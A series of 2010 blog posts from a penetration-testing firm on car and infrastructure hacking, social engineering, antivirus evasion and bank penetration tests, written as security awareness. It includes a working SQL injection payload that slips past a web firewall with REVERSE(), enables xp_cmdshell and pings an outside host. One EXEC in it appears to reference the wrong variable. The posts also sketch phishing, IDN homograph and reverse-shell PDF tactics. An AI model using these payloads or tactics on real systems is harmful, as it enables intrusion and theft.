Thursday, December 2, 2010

Untitled

I recently participated in a panel at the BASC conference that was held at the Microsoft New England Research & Development (NERD) building at One Memorial Drive in Cambridge. One of the questions that surfaced inspired me to write this article.

While there are more security solutions available today than ever before, are we actually becoming more secure or is the gap growing? The short answer is yes. The security industry is reactive in that it can only respond to threats but it cannot predict them. This is because of threats are defined by malicious hackers and technology savvy criminals and not the security industry. Antivirus technology for example, was created as a response to viruses that were being written by hackers. So yes, security is getting better, technologies are advancing, and the gap is still growing rapidly. One major part of the problem is that people adopt new technologies too quickly. They don’t stop to question those technologies from the perspective a hacker…

A prime example of this problem is clearly demonstrated within the automotive industry. Computer systems that are in automobiles were not designed to withstand any sort of real hacker threat. This wasn’t much of a problem at first because automotive computer systems weren’t Internet connected and at first they didn’t have direct control over things like breaks and the accelerator. That all changed as the automotive industry advanced and as people wanted the convenience that computer technology could bring to the table. Now automotive computer systems directly control critical automotive functions and a hacker can interface with the computer system and cause potentially catastrophic failures. Despite this the problem wasn’t perceived as particularly high risk because accessing the computer system required physical access to the car (or close proximity for TPMS like hacks). That is all going to change when the Chevy Volt hits the streets since the Chevy Volt actually has its own IP address and is network connected. Is the risk really worth the convenience?

Another good example of how we adopt technology too quickly is demonstrated in critical infrastructure (power, water, communications, etc). Just like the automotive industry critical systems were not initially designed to be plugged into the Internet. These critical systems are the systems that control the water coolant levels in our nuclear power plants or the mixtures of chemicals in water treatment plants, etc. Some of these critical systems were designed in the 1960’s so the concept of the “hacker threat” didn’t exist. Other systems are very modern but even those aren’t designed to be secure as much as they are designed to be functional. Back in the day power plants, water treatment plants, etc. were air-gaped to isolate them from potentially harmful environments. But as the Internet offered more and more convenience the air-gaps that once existed are almost extinct. Now our critical systems connected to the Internet and exposed to real hacker threats; and do they get hacked? Yes. Again, is the risk really worth the convenience?

Of course an example that everyone can relate to is business networks. Business networks are constantly evolving and new technologies are continually being adopted without proper vetting. These technologies often include web applications, security technologies, backup technologies, content management systems, etc. These technologies usually promise to make things easier and thus save time which equates to saving money. For example, the other week we were delivering a penetration test for a pharmaceutical company. This company had a video conference system setup so that they could speak with remote offices and have “face to face” conversations. They loved the technology because it made for more productive meetings and we loved the technology because it was easy to hack.

Despite the fact that the security industry is evolving at a rapid pace, it can’t keep up with the volume of people that are prematurley adopting new and untested technologies. This adoption causes the gap between good security and security risks to grow. To help close the gap consumers need to start challenging their vendors. They need to ask their vendors to demonstrate the security of their technology and maybe even to make some sort of a guarantee about it. There are some solid companies out there that offer services designed to enhance the security of technology products. Once such company is Veracode (no affiliation with Netragard).

Thursday, November 11, 2010

Fox 25 News Interview

Our (Netragard's) founder and president (Adriel Desautels) was recently interviewed by the local news (Fox 25) about car hacking.  We thought that we'd write a quick entry and share this with you. Thank you to Fox 25 for doing such a good job with the interview.  Note for the AAA guy though, once cars have IP addresses (which is now) hackers won't need to "pull up next to you to hack [your car]" and turning the car off is the least of the problems.  Hackers will be able to do it from their location of choice and trust us when we say that "firewalls" don't pose much of a challenge at all.  Anyway, enjoy the video and please feel free to comment.

http://www.myfoxboston.com/dpp/news/special_reports/could-your-car-be-a-hackers-target-20101111

Monday, September 13, 2010

The Human Vulnerability

It seems to us that one of the biggest threats that businesses face today is socially augmented malware attacks. These attacks have an extremely high degree of success because they target and exploit the human element. Specifically, it doesn't matter how many protective technology layers you have in place if the people that you've hired are putting you at risk, and they are.

Case in point, the “here you have” worm that propagates predominantly via e-mail and promises the recipient access to PDF documents or even pornographic material. This specific worm compromised major organizations such as NASA, ABC/Disney, Comcast, Google Coca-Cola, etc. How much money do you think that those companies spend on security technology over a one-year period? How much good did it do at protecting them from the risks introduced by the human element? (Hint: none)

Here at Netragard we have a unique perspective on the issue of malware attacks because we offer pseudo-malware testing services. Our pseudo-malware module, when activated, authorizes us to test our clients with highly customized, safe, controlled, and homegrown pseudo-malware variants. To the best of our knowledge we are the only penetration testing company to offer such a service (and no, we're not talking about the meterpreter).

Attack delivery usually involves attaching our pseudo-malware to emails or binding the pseudo-malware to PDF documents or other similar file types. In all cases we make it a point to pack (or crypt) our pseudo-malware so that it doesn't get detected by antivirus technology (see this blog entry on bypassing antivirus). Once the malware is activated, it establishes an encrypted connection back to our offices and provides us with full control over the victim computer. Full control means access to the software and hardware including but not limited to keyboard, mouse, microphone and even the camera. (Sometimes we even deliver our attacks via websites like this one by embedding attacks into links).

So how easy is it to penetrate a business using pseudo-malware? Well in truth its really easy. Just last month we finished delivering an advanced external penetration test for one of our more secure customers. We began crafting an email that contained our pseudo-malware attachment and accidentally hit the send button without any message content. Within 45 seconds of clicking the send button and sending our otherwise blank email, we had 15 inbound connections from 15 newly infected client computer systems. That means that at least 15 employees tried to open our pseudo-malware attachment despite the fact that the email was blank! Imagine the degree of success that is possible with a well-crafted email?

One of the computer systems that we were able to compromise was running a service with domain admin privileges. We were able to use that computer system (impersonation attack involved) to create an account for ourselves on the domain (which happened to be the root domain). From there we were able to compromise the client's core infrastructure (switches, firewalls, etc) due to a password file that we found sitting on someone's desktop (thank you for that). Once that was done, there really wasn't much more that we had left to do, it was game over.

The fact of the matter is that there's nothing new about taking advantage of people that are willing to do stupid things. But is it really stupidity or is it just that employees don't have a sense of accountability? Our experience tells us that in most cases its a lack of accountability that's the culprit.

When we compromise a customer using pseudo-malware, one of the recommendations that we make to them is that they enforce policies by holding employees accountable for violations. We think that the best way to do that is to require employees to read a well-crafted policy and then to take a quiz based on that policy. When they pass the quiz they should be required to sign a simple agreement that states that they have read the policy, understood the policy, and agree to be held accountable for any violations that they make against the policy.

In our experience there is no better security technology than a paranoid human that is afraid of being held accountable for doing anything irresponsible (aka: violating the policy). When people are held accountable for something like security they tend to change their overall attitude towards anything that might negatively affect it. The result is a significantly reduced attack surface. If all organizations took this strict approach to policy enforcement then worms like the "here you have" worm wouldn't be such a big success.

Compare the cost and benefit of enforcing a strict and carefully designed security policy to the cost and benefit of expensive (and largely ineffective) security technologies. Which do you think will do a better job at protecting your business from real threats? Its much more difficult to hack a network when that network is managed by people that are held accountable for its security than it is to hack a network that is protected technology alone.

So in the end there's really nothing special about the "here you have" worm. It’s just another example of how malicious hackers are exploiting the same human vulnerability using an ever so slightly different malware variant. Antivirus technology certainly won’t save you and neither will other expensive technology solutions, but a well-crafted, cost-effective security policy just might do the trick.

It’s important to remember that well written security policies don’t only impact human behavior, but generally result in better management of systems, which translates to better technological security. The benefits are significant and the overall cost isn’t in comparison.

Tuesday, August 31, 2010

That nice, new computerized car you just bought could be hackable

 

 

Link: http://news.cnet.com/8301-27080_3-20015184-245.html

Of course, your car is probably not a high-priority target for most malicious hackers. But security experts tell CNET that car hacking is starting to move from the realm of the theoretical to reality, thanks to new wireless technologies and evermore dependence on computers to make cars safer, more energy efficient, and modern.

 

"Now there are computerized systems and they have control over critical components of cars like gas, brakes, etc.," said Adriel Desautels, chief technology officer and president of Netragard, which does vulnerability assessments and penetration testing on all kinds of systems. "There is a premature reliance on technology."

 

 

Illustration for a tire pressure monitoring system, with four antennas, from a report detailing how researchers were able to hack the wireless system.

(Credit: University of South Carolina, Rutgers University (PDF))   

 

 

Often the innovations are designed to improve the safety of the cars. For instance, after a recall of Firestone tires that were failing in Fords in 2000, Congress passed the TREAD (Transportation Recall Enhancement, Accountability and Documentation) Act that required that tire pressure monitoring systems (TPMS) be installed in new cars to alert drivers if a tire is underinflated.

 

Wireless tire pressure monitoring systems, which also were touted as a way to increase fuel economy, communicate via a radio frequency transmitter to a tire pressure control unit that sends commands to the central car computer over the Controller-Area Network (CAN). The CAN bus, which allows electronics to communicate with each other via the On-Board Diagnostics systems (OBD-II), is then able to trigger a warning message on the vehicle dashboard.

 

Researchers at the University of South Carolina and Rutgers University tested two tire pressure monitoring systems and found the security to be lacking. They were able to turn the low-tire-pressure warning lights on and off from another car traveling at highway speeds from 40 meters (120 feet) away and using low-cost equipment.

 

"While spoofing low-tire-pressure readings does not appear to be critical at first, it will lead to a dashboard warning and will likely cause the driver to pull over and inspect the tire," said the report (PDF). "This presents ample opportunities for mischief and criminal activities, if past experience is any indication."

 

"TPMS is a major safety system on cars. It's required by law, but it's insecure," said Travis Taylor, one of the researchers who worked on the report. "This can be a problem when considering other wireless systems added to cars. What does that mean about future systems?"

 

The researchers do not intend to be alarmist; they're merely trying to figure out what the security holes are and to alert the industry to them so they can be fixed, said Wenyuan Xu, another researcher on the project. "We are trying to raise awareness before things get really serious," she said.

 

Another report in May highlighted other risks with the increased use of computers coordinated via internal car networks. Researchers from the University of Washington and University of California, San Diego, tested how easy it would be to compromise a system by connecting a laptop to the onboard diagnostics port that they then wirelessly controlled via a second laptop in another car. Thus, they were able to remotely lock the brakes and the engine, change the speedometer display, as well as turn on the radio and the heat and honk the horn.

 

Granted, the researchers needed to have physical access to the inside of the car to accomplish the attack. Although that minimizes the likelihood of an attack, it's not unthinkable to imagine someone getting access to a car dropped off at the mechanic or parking valet.

 

"The attack surface for modern automobiles is growing swiftly as more sophisticated services and communications features are incorporated into vehicles," that report (PDF) said. "In the United States, the federally-mandated On-Board Diagnostics port, under the dash in virtually all modern vehicles, provides direct and standard access to internal automotive networks. User-upgradable subsystems such as audio players are routinely attached to these same internal networks, as are a variety of short-range wireless devices (Bluetooth, wireless tire pressure sensors, etc.)."

 

Engine Control Units
The ubiquitous Engine Control Units themselves started arriving in cars in the late 1970s as a result of the California Clean Air Act and initially were designed to boost fuel efficiency and reduce pollution by adjusting the fuel and oxygen mixture before combustion, the paper said. "Since then, such systems have been integrated into virtually every aspect of a car's functioning and diagnostics, including the throttle, transmission, brakes, passenger climate and lighting controls, external lights, entertainment, and so on," the report said.

 

It's not just that there are so many embedded computers, it's that safety critical systems are not isolated from non-safety critical systems, such as entertainment systems, but are "bridged" together to enable "subtle" interactions, according to the report. In addition, automakers are linking Engine Control Units with outside networks like global positioning systems. GM's OnStar system, for example, can detect problems with systems in the car and warn drivers, place emergency calls, and even allow OnStar personnel to r emotely unlock cars or stop them, the report said.

 

In an article entitled "Smart Phone + Car = Stupid?" on the EETimes site in late July, Dave Kleidermacher noted that GM is adding smartphone connectivity to most of its 2011 cars via OnStar. "For the first time, engines can now be started and doors locked by ordinary consumers, from anywhere on the planet with a cell signal," he wrote.

 

Car manufacturers need to design the systems with security in mind, said Kleidermacher, who is chief technology officer at Green Hills Software, which builds operating system software that goes into cars and other embedded systems.

 

"You can not retrofit high-level security to a system that wasn't designed for it," he told CNET. "People are building this sophisticated software into cars and not designing security in it from the ground up, and that's a recipe for disaster."

 

Representatives from GM OnStar were not available for comment late last week or this week, a spokesman said.

 

"Technology in cars is not designed to be secure because there's no perceived threat. They don't think someone is going to hack a car like they're going to hack a bank," said Desautels of Netragard. "For the interim, network security in cars won't be a primary concern for manufacturers. But once they get connected to the Internet and have IP addresses, I think they'll be targeted just for fun."

 

The threat is primarily theoretical at this point for a number of reasons. First, there isn't the same financial incentive to hacking cars as there is to hacking online bank accounts. Secondly, there isn't one dominant platform used in cars that can give attackers the same bang for their buck to target as there is on personal computers.

 

"The risks are certainly increasing because there are more and more computers in the car, but it will be much tougher to (attack) than with the PC," said Egil Juliussen, a principal analyst at market researcher firm iSuppli. "There is no equivalent to Windows in the car, at least not yet, so (a hacker) will be dealing with a lot of different systems and have to have some knowledge about each one. It doesn't mean a determined hacker couldn't do it."

 

But Juliussen said drivers don't need to worry about anything right now. "This is not a problem this year or next year," he said. "Its five years down the road, but the way to solve it is to build security into the systems now."

 

Infotainment systems
In the meantime, the innovations in mobile communications and entertainment aren't limited to smartphones and iPads. People want to use their devices easily in their cars and take advantage of technology that will let them make calls and listen to music without having to push any buttons or touch any track wheels. Hands-free telephony laws in states are requiring this.

 

Millions of drivers are using the SYNC system that has shipped in more than 2 million Ford cars that allows people to connect digital media players and Bluetooth-enabled mobile phones to their car entertainment system and use voice commands to operate them. The system uses Microsoft Auto as the operating system. Other cars offer less-sophisticated mobile device connectivity.

 

"A lot of cars have Bluetooth car kits built into them so you can bring the cell phone into your car and use your phone through microphones and speakers built into the car," said Kevin Finisterre, lead researcher at Netragard. "But vendors often leave default passwords."

 

Ford uses a variety of security measures in SYNC, including only allowing Ford-approved software to be installed at the factory and default security set to Wi-Fi Protected Access 2 (WPA2), which requires users to enter a randomly chosen password to connect to the Internet. To protect customers when the car is on the road and the Mobile Wi-Fi Hot Spot feature is enabled, Ford also uses two firewalls on SYNC, a network firewall similar to a home Wi-Fi router and a separate central processing unit that prevents unauthorized messages from bei ng sent to other modules within the car.

 

"We use the security models that normal IT folks use to protect an enterprise network," said Jim Buczkowski, global director of electrical and electronics systems engineering for Ford SYNC.

 

Not surprisingly, there is a competing vehicle "infotainment" platform being developed that is based on open-source technology. About 80 companies have formed the Genivi Alliance to create open standards and middleware for information and entertainment solutions in cars.

 

Asked if Genivi is incorporating security into its platform from the get-go, Sebastian Zimmermann, chair of the consortium's product definition and planning group, said it is up to the manufacturers that are creating the branded devices and custom apps to build security in and to take advantage of security mechanisms provided in Linux, the open-source operating system the platform is based on.

 

"Automakers are aware of security and have taken it seriously...It's increasingly important as the vehicle opens up new interfaces to the outside world," Zimmermann said. "They are trying to find a balance between openness and security."

 

Another can of security worms being opened is the fact that cars may follow the example of smart phones and Web services by getting their own customized third-party apps. Hughes Telematics reportedly is working with automakers on app stores for drivers.

 

This is already happening to some extent, for instance, with video cameras becoming standard in police cars and school buses, bringing up a host of security and privacy issues.

 

"We did a penetration test where we had a police agency that has some in-car cameras," Finisterre of Netragard said, "and we were able to access the cameras remotely and have live audio and video streams from the police car due to vulnerabilities in the manufacturing systems."

 

"I'm sure (eventually) there is going to be smart pavement and smart lighting and other dumb stuff that has the capability of interacting with the car in the future," he said. "Technology is getting pushed out the door with bells and whistles and security gets left behind."

 

 

 

 


 

 

Friday, August 6, 2010

Bypassing Antivirus to Hack You

Many people assume that running antivirus software will protect them from malware (viruses, worms, trojans, etc), but in reality the software is only partially effective. This is true because antivirus software can only detect malware that it knows to look for. Anything that doesn’t match a known malware pattern will pass as a clean and trusted file.


Antivirus technologies use virus definition files to define known malware patterns. Those patterns are derived from real world malware variants that are captured in the wild. It is relatively easy to bypass most antivirus technologies by creating new malware or modifying existing malware so that it does not contain any identifiable patterns.

One of the modules that our customers can activate when purchasing Penetration Testing services from us, is the Pseudo Malware module. As far as we know, we are one of the few Penetration Testing companies to actually use Pseudo Malware during testing. This module enables our customers to test how effective their defenses are against real world malware threats but in a safe and controllable way.

Our choice of Pseudo Malware depends on the target that we intend to penetrate and the number of systems that we intend to compromise. Sometimes we’ll use Pseudo Malware that doesn’t automatically propagate and other times we’ll use auto-propagation. We should mention that this Pseudo Malware is only “Pseudo” because we don’t do anything harmful with it and we use it ethically. The fact of the matter is that this Pseudo Malware is very real and very capable technology.

Once we’ve determined what Pseudo Malware variant to go with, we need to augment the Pseudo Malware so that it is not detectable by antivirus scanners. We do this by encrypting the Pseudo Malware binary with a special binary encryption tool. This tool ensures that the binary no longer contains patters that are detectable by antivirus technologies.

Before Encryption:


After Encryption: (Still Infected)

As you can see from the scan results above, the Pseudo Malware was detected by most antivirus scanners before it was encrypted. We expected this because we chose a variant of Pseudo Malware that contained several known detectable patterns. The second image (after encryption) shows the same Pseudo Malware being scanned after encryption. As you can see, the Pseudo Malware passed all antivirus scanners as clean.

Now that we've prevented antivirus software from being able to detect our Pseudo Malware, we need to distribute it to our victims. Distribution can happen many ways that include but are not limited to infected USB drives, infected CD-ROM's, Phishing emails augmented by IDN homograph attacks with the Pseudo Malware attached, Facebook, LinkedIn, MySpace, binding to PDF like files, etc.

Our preferred method for infection is email (or maybe not). This is because it is usually very easy to gather email addresses using various existing email harvesting technologies and we can hit a large number of people at the same time. When using email, we may embed a link that points directly to our Pseudo Malware, or we might just insert the malware directly into the email. Infection simply requires that the user click our link or run the attached executable. In either case, the Pseudo Malware is fast and quiet and the user doesn't notice anything strange.

Once a computer is infected with our Pseudo Malware it connects back to our Command and Control server and grants us access to the system unbeknownst to the user. Once we have access we can do anything that the user can do including but not limited to seeing the users screen as if we were right there, running programs, installing software, uninstalling software, activating web cam's and microphones, accessing and manipulating hardware, etc. More importantly, we can use that computer to compromise the rest of the network through a process called Distributed Metastasis.

Despite how easy it is to bypass antivirus technologies, we still very strongly recommend using them as they keep you protected from known malware variants.






Monday, June 14, 2010

Security Vulnerability Penetration Assessment Test?

Our philosophy here at Netragard is that security-testing services must produce a threat that is at least equal to the threat that our customers are likely to face in the real world. If we test our customers at a lesser threat level and a higher-level threat attempts to align with their risks, then they will likely suffer a compromise. If they do suffer a compromise, then the money that they spent on testing services might as well be added to the cost in damages that result from the breach.
This is akin to how armor is tested. Armor is designed to protect something from a specific threat. In order to be effective, the armor is exposed to a level of threat that is slightly higher than what it will likely face in the real world. If the armor is penetrated during testing, it is enhanced and hardened until the threat cannot defeat the armor. If armor is penetrated in battle then there are casualties. That class of testing is called Penetration Testing and the level of threat produced has a very significant impact on test quality and results.

What is particularly scary is that many of the security vendors who offer Penetration Testing services either don't know what Penetration Testing is or don’t know the definitions for the terms. Many security vendors confuse Penetration Testing with Vulnerability Assessments and that confusion translates to the customer. The terms are not interchangeable and they do not define methodology, they only define testing class. So before we can explain service quality and threat, we must first properly define services.

Based on the English dictionary the word “Vulnerability” is best defined as susceptibility to harm or attack. Being vulnerable is the state of being exposed. The word “Assessment” is best defined as the means by which the value of something is estimated or determined usually through the process of testing. As such, a “Vulnerability Assessment” is a best estimate as to how susceptible something is to harm or attack.

Lets do the same for “Penetration Test”. The word “Penetration” is best defined as the act of entering into or through something, or the ability to make way into or through something. The word “Test” is best defined as the means by which the presence, quality or genuineness of anything is determined. As such the term “Penetration Test” means to determine the presence of points where something can make its way through or into something else.

Despite what many people think, neither term is specific to Information Technology. Penetration Tests and Vulnerability Assessments existed well before the advent of the microchip. In fact, the ancient Romans used a form of penetration testing to test their armor against various types of projectiles. Today, we perform Structural Vulnerability Assessments against things like the Eiffel Tower, and the Golden Gate Bridge. Vulnerability Assessments are chosen because Structural Penetration Tests would cause damage to, or possibly destroy the structure.

In the physical world Penetration Testing is almost always destructive (at least to a degree), but in the digital world it isn’t destructive when done properly. This is mostly because in the digital world we’re penetrating a virtual boundary and in the physical world we’re penetrating a physical boundary. When you penetrate a virtual boundary you’re not really creating a hole, you’re usually creating a process in memory that can be killed or otherwise removed.

When applied to IT Security, a Vulnerability Assessment isn't as accurate as a Penetration Test. This is because Vulnerability Assessments are best estimates and Penetration Tests either penetrate or they don’t. As such, a quality Vulnerability Assessment report will contain few false positives (false findings) while a quality Penetration Testing report should contain absolutely no false positives. (though they do sometimes contain theoretical findings).

The quality of service is determined by the talent of the team delivering services and by the methodology used for service delivery. A team of research capable ethical hackers that have a background in exploit development and system / network penetration will usually deliver higher quality services than a team of people who are not research capable. If a team claims to be research capable, ask them for example exploit code that they’ve written and ask them for advisories that they’ve published.

Service quality is also directly tied to threat capability. The threat in this case is defined by the capability of real world malicious hackers. If testing services do not produce a threat level that is at least equal to the real world threat, then the services are probably not worth buying. After all, the purpose for security testing is to identify risks so that they can be fixed / patched / eliminated before malicious hackers exploit them. But if the security testing services are less capable than the malicious hacker, then chances are the hacker will find something that the service missed.

Friday, June 11, 2010

We Are Politically Incorrect


Back in February of 2009 we released an article called FaceBook from the hackers perspective. As far as we know, we were the first to publish a detailed article about using Social Networking Websites to deliver surgical Social Engineering attacks. Since that time, we noticed a significant increase in marketing hype around Social Engineering from various other security companies. The problem is that they're not telling you the whole truth.

The whole truth is that Social Engineering is a necessary but potentially dangerous service. Social Engineering at its roots is the act of exploiting the human vulnerability and as such is an offensive and politically incorrect service. If a customer’s business has any pre-existing social or political issues then Social Engineering can be like putting a match to a powder keg. In some cases the damages can be serious and can result in legal action between employee and employer, or visa versa.

It’s for this reason that businesses need to make sure that their environments are conducive to receiving social attacks, and that they are prepared to deal with the emotional consequences that might follow. If employees are trained properly and if security policies are enforced that cover the social vector, then things “should” be ok. If those policies don’t exist and if there’s any internal turmoil, high-risk employees, or potentially delicate political situations, then Social Engineering is probably not such a great idea as it will likely identify and exploit one of those pre-existing issues.

For example, we recently delivered services to a customer that had pre-existing issues but assumed that their environment was safe for testing with Social Engineering. In this particular case the customer had an employee that we’ll call Jane Doe who was running her own business on the side. Jane Doe was advertising her real employers name on her business website making it appear as if there was a relationship between her employer and her business. She was also advertising her business address as her employers address on her FaceBook fan page. From our perspective, Jane Doe was a perfect Social Engineering target.

With this social risk identified, we decided that we’d impersonate Jane Doe and hijack the existing relationships that she had with our customer (her employer). We accomplished this with a specially crafted phishing attack.

The first step in the phish was to collect content for the phishing email. In this case Jane Doe posted images to her FaceBook fan page that included a photo of herself and a copy of her businesses logo. We used those images to create an email that looked like it originated from Jane Doe’s email address at our customers network and was offering the recipient discounted pricing. (Her FaceBook privacy settings were set to allow everybody.)

Once we had the content for the phishing email set up we used an IDN homograph attack to register a new domain that appeared to be identical to our customers domain. For example, if our customer was SNOsoft and their real domain was snosoft.com, the fake domain looked just like “snosoft.com”.

We embedded a link into the phishing email using the fake domain to give it a legitimate look and feel. The link was advertised as the place to click to get information about specially discounted offerings that were specific to our customer’s employees. Of course, the link really pointed to our web server where we were hosting a browser based exploit.

Then we collected email addresses using an enumerator and loaded those into a distribution list. We sent a test email to ourselves first to make sure that everything would render ok. Once our testing was complete, we clicked send and the phish was on its way. Within 15 minutes of delivering the attack our customer called us and requested that all testing be stopped. But by that time, 38 people had already clicked on our embedded URL, and more clicks were on their way.

As it turns out, our customer wasn’t prepared to receive Social Engineering tests despite the fact that they requested them. At first they accused us of being unprofessional because we used Jane Doe’s picture in the phishing email, which was apparently embarrassing to Jane Doe. Then they accused us of being politically incorrect for the same reason.

So we asked our customer, “Do you think that a black-hat would refrain from doing this because it’s politically incorrect?” Then we said, “Imagine if a black-hat launched this attack, and received 38 clicks (and counting).” (Each click representing a potential compromise).

While we can’t go into much more detail for reasons of confidentiality, the phishing attack uncovered other more serious internal and political issues. Because of those issues, we had to discontinue testing and move to report delivery. There was no fault or error on our part as everything was requested and authorized by the customer, but this was certainly a case of the match and the powder keg.

Despite the unfortunate circumstances, the customer did benefit significantly from the services. Specifically, the customer became aware of some very serious social risks that would have been extremely damaging had they been identified and exploited by black-hat hackers. Even if it was a painful process for the customer, we’re happy that we were able to deliver the services as we did because they enabled our customer to reduce their overall risk and exposure profile.

The moral of the story is that businesses should take care and caution when requesting Social Engineering services. They should be prepared for uncomfortable situations and discoveries, and if possible they should train and prepare their employees in advance. In the end it boils down to one of two things. Is it more important for a company to understand their risks or is it more important to avoid embarrassing or offending an employee.

Sunday, May 16, 2010

REVERSE(noitcejnI LQS dnilB) Bank Hacking

Earlier this year we were hired to perform an Overt Web Application Penetration Test for one of our banking customers (did you click that?). This customer is a reoccurring customer and so we know that they have Web Application Firewalls and Network Intrusion Prevention Systems in play. We also know that they are very security savvy and that they respond to attacks promptly and appropriately.


Because this test was Overt in nature (non-stealth) we began testing by configuring Acunetix to use burpsuite-pro as a proxy. Then we ran an automated Web Application Vulnerability Scan with Acunetix and watched the scan populate burpsuite-pro with information. While the scan results were mostly fruitless we were able to pick up with manual testing and burpsuite-pro.

While the automated scans didn’t find anything our manual testing identified an interesting Blind SQL Injection Vulnerability. This blind SQL Injection vulnerability was the only vulnerability that we discovered that had any real potential.

It’s important understand to the difference between standard SQL Injection Vulnerabilities and Blind SQL Injection Vulnerabilities. A standard SQL Injection Vulnerability will return useful error information to the attacker and usually display that information in the attackers web browser. That information helps the attacker debug and refine the attack. Blind SQL Injection Vulnerabilities return nothing, making them much more difficult to exploit.

Since the target Web Application was protected by two different Intrusion Prevention Technologies, and since the vulnerability was a Blind SQL Injection Vulnerability, we knew that exploitation wasn’t going to be easy. To be successful we’d first need to defeat the Network Intrusion Prevention System and then the Web Application Firewall.

Defeating Network Intrusion Prevention Systems is usually fairly easy. The key is to find an attack vector that the Network Intrusion Prevention System can’t monitor. In this case (like most cases) our Web Application’s server accepted connections over SSL (via HTTPS). Because SSL based traffic is encrypted the Network Intrusion Prevention System can’t intercept and analyze the traffic.

Defeating Web Application Firewalls is a bit more challenging. In this case, the Web Application Firewall was the termination point for the SSL traffic and so it didn’t suffer from the same SSL blindness issues that the Network Intrusion Prevention System did. In fact, the Web Application Firewall was detecting and blocking our embedded SQL commands very successfully.

We tried some of the known techniques for bypassing Web Application Firewalls but to no avail. The vendor that makes this particular Web Application Firewall does an excellent job at staying current with the latest methods for bypassing Web Application Firewall technologies.

Then we decided that we’d try attacking backwards. Most SQL databases support a reverse function. That function does just what you’d think that it would do; it returns the reverse of whatever string you feed it. So we wrote our commands backwards and encapsulated then in the reverse() function provided by the SQL server. When we fed our new reversed payloads to the Web Application the Web Application Firewall failed to block the commands.

As it turns out most (maybe all) Web Application Firewalls can be bypassed if you reverse the spelling of your SQL commands. So you’d rewrite “xp_cmdshell” as “llehsdmc_px” and then encapsulate it in the reverse function. As far as we know we’re the first to discover and use this method to successfully bypass a Web Application Firewall.

The next step in the attack was to reconfigure and enable the xp_cmdshell function. The xp_cmdshell is important as it executes a given command string as an operating-system command shell and returns any output rows of text. Simply put, it’s just like sitting at the DOS prompt.

The technique used to reconfigure the xp_cmdshell functionality is well known and well documented. But, since we did it using backwards commands we thought that we would show you what it looked like.

var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @c =REVERSE('"moc.dragarten gnip" llehsdmc_px') EXEC (@c);--

The above SQL commands do the following three things:

1-) C:\> show advanced options, 1 \n

Use the “show advanced options” option to display the sp_configure system stored procedure advanced options. When you set show advanced options to 1, you can list the advanced options by using sp_configure. The default is 0. The setting takes effect immediately without a server restart.

2-) C:\> master.dbo.sp_configure xp_cmdshell, 1

This enables the xp_cmdshell functionality in the MsSQL database so that we can execute operating-system commands by calling xp_cmdshell. xp_cmdshell is disabled by default.

3-) C:\> ping netragard.com

Because we were dealing with a Blind SQL Injection Vulnerability we needed a creative way to test that we’d successfully re-enabled the xp_cmdshell function. To do that we set up a sniffer on our outside firewall interface and configured it to alert us when we received pings from our banking customer’s network. Then in the SQL payload (shown above) we included the command “ping netragard.com”. Then when we received ICMP packets from our customers network we knew that our command had been executed successfully.

Now that we had confirmed that our Blind Reversed SQL Injection attack was viable and that we had successfully enabled the xp_cmdshell functionality, the last thing for us to do was to extract database information. But how do we extract database information using a Blind SQL Injection Vulnerability if the vulnerability never returns any information?

That's actually pretty easy. Most databases support conditional statements (if condition then do something). So, we used conditional statements combined with timing to extract database information. Specifically, if table name equals "users" then wait for 3 seconds, if it doesn't then return control immediately. Then if the database doesn't respond for 3 seconds we know that we've guessed the name of one of the tables correctly.

Sure there are other things that we could have done, but we're the good guys.

Monday, April 26, 2010

Netragard Hacking Your Bank

We were recently hired to perform an interesting Advanced Stealth Penetration test for a mid-sized bank. The goal of the penetration test was to penetrate into the bank’s IT Infrastructure and see how far we could get without detection. This is a bit different than most penetration tests as we weren’t tasked with identifying risks as much as we were with demonstrating vulnerability.

The first step of any penetration test is reconnaissance. Reconnaissance is the military term for the passive collection of intelligence about an enemy prior to attacking that enemy. It is technically impossible to effectively attack an enemy without first obtaining actionable intelligence about the enemy. Failure to collect good intelligence can result in significant casualties, unnecessary collateral damage and a completely failed attack. In penetration testing, damages are realized by downed systems and a loss of revenue.

Because this engagement required stealth, we focused on the social attack vectors and Social Reconnaissance. We first targeted FaceBook with our “FaceBook from the hackers perspective“ methodology. That enabled us to map relationships between employees, vendors, friends, family etc. It also enabled us to identify key people in Accounts Receivable / Accounts Payable (“AR/AP”).

In addition to FaceBook, we focused on websites like Monster, Dice, Hot Jobs, LinkedIn, etc. We identified a few interesting IT related job openings that disclosed interesting and useful technical information about the bank. That information included but was not limited to what Intrusion Detection technologies had been deployed, what their primary Operating Systems were for Desktops and Servers, and that they were a Cisco shop.

Naturally, we thought that it was also a good idea to apply for the job to see what else we could learn. To do that, we created a fake resume that was designed to be the “perfect fit” for a “Sr. IT Security Position” (one of the opportunities available). Within one day of submission of our fake resume, we had a telephone screening call scheduled.

We started the screening call with the standard meet and greet, and an explanation of why we were interested in the opportunity. Once we felt that the conversation was flowing smoothly, we began to dig in a bit and start asking various technology questions. In doing so, we learned what Anti-Virus technologies were in use and we also learned what the policies were for controlling outbound network traffic.

That’s all that we needed…

Upon completion of our screening call, we had sufficient information to attempt stealth penetration with a high probability of success. The beauty is that we collected all of this information without sending a single packet to our customer’s network. In summary we learned:

  • That the bank uses Windows XP for most Desktops
  • Who some of the bank’s vendors were (IT Services)
  • The names and email addresses of people in AR/AP
  • What Anti-Virus technology the bank uses
  • Information about the banks traffic control policies

Based on the intelligence that we collected we decided that the ideal scenario for stealth penetration would be to embed an exploit into a PDF document and to send that PDF document to the bank’s AR/AP department from the banks trusted IT Services provider. This attack was designed to exploit the trust that our customer had with their existing IT Services provider.

When we created the PDF, we used the new reverse https payload that was recently released by the Metasploit Project. (Previously we were using similar but more complex techniques for encapsulating our reverse connections in HTTPS). We like reverse HTTPS connections for two reasons:

  • First, Intrusion Detection Technologies cannot monitor encrypted network traffic. Using an encrypted reverse connection ensures that we are protected from the prying eyes of Intrusion Detection Systems and less likely to trip alarms.
  • Second, most companies allow outbound HTTPS (port 443) because its required to view many websites. The reverse HTTPS payload that we used mimics normal web browsing behavior and so is much less likely to set off any Intrusion Detection events.
